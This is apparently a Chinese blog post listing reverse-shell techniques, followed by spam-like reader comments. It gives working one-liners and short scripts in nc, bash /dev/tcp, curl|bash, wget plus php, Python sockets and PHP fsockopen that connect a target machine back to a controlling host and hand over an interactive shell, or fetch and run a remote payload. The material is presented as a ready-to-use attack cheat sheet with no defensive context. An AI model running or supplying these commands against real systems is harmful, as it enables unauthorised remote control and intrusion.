利用nc反弹shell的方式:

远程控制主机 1.1.1.1,2333 目标机器:192.168.1.1

远程主机监听:

nc -lvvp 2333

反弹shell

  1. windows版
    nc.exe -e cmd.exe 1.1.1.1 2333
  2. bash版
    bash -i >& /dev/tcp/1.1.1.1/2333 0>&1
  3. netcat版
    nc 1.1.1.1 7777 -t /bin/bash
  4. curl版
    前提要利用bash一句话的情况下使用curl反弹shell,例如在自己的服务器index上写上一句话 bash -i >& /dev/tcp/192.168.20.151/7777 0>&1,然后在目标主机上执行curl 1.1.1.1.1|bash
  5. wget 版
    类似curl
    eg:
    wget 1.1.1.1/shell.txt -O /tmp/x.php && php /tmp/x.php
  6. python版
    curl 1.1.1.1/shell.py | python
#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("1.1.1.1",2333)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
  1. php反弹
<?php
$sock=fsockopen("1.1.1.1",2333);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>

这里要将php保存成txt文件进行反弹,若为php文件不会反弹成功.
curl 1.1.1.1/shell.txt | php

16 对 “反弹shell”的想法;

  1. I really wanted to post a quick message in order to appreciate you for some of the magnificent tips and hints you are showing at this site. My incredibly long internet investigation has now been honored with brilliant suggestions to exchange with my good friends. I ‘d believe that many of us readers actually are undeniably blessed to live in a wonderful place with very many marvellous professionals with insightful advice. I feel rather grateful to have seen the site and look forward to many more fun times reading here. Thank you once more for everything.

  2. I have to voice my passion for your kind-heartedness supporting folks that should have assistance with this one theme. Your personal commitment to passing the solution all around had been rather insightful and has regularly enabled ladies just like me to arrive at their goals. Your amazing helpful information implies much a person like me and much more to my fellow workers. With thanks; from everyone of us.

  3. I want to point out my appreciation for your kindness supporting women who absolutely need help on your niche. Your personal dedication to getting the message across had been pretty significant and has continually empowered many people like me to realize their ambitions. Your personal invaluable tips and hints can mean much a person like me and even further to my office workers. Regards; from each one of us.

  4. I actually wanted to develop a remark to be able to say thanks to you for those magnificent items you are giving out here. My long internet research has at the end been rewarded with good know-how to talk about with my neighbours. I ‘d assume that many of us visitors actually are really endowed to be in a magnificent community with so many wonderful individuals with interesting tips and hints. I feel rather privileged to have seen your site and look forward to some more cool times reading here. Thanks once again for a lot of things.

  5. Appreciating the dedication you put into your blog and in depth information you present.
    It’s awesome to come across a blog every once in a while that
    isn’t the same out of date rehashed material.
    Fantastic read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.

  6. After I originally left a comment I seem to have clicked on the -Notify me when new comments are added- checkbox and from now on whenever a comment is added I
    recieve four emails with the exact same comment.
    Is there a means you are able to remove me from that service?
    Many thanks!

  7. Hello, i thknk thaqt i saw you visited myy sute so i cawme
    to “return thhe favor”.I am trying to find thiongs too immprove myy wweb site!I supopose its okk to usse soome of your
    ideas!!

发表评论

邮箱地址不会被公开。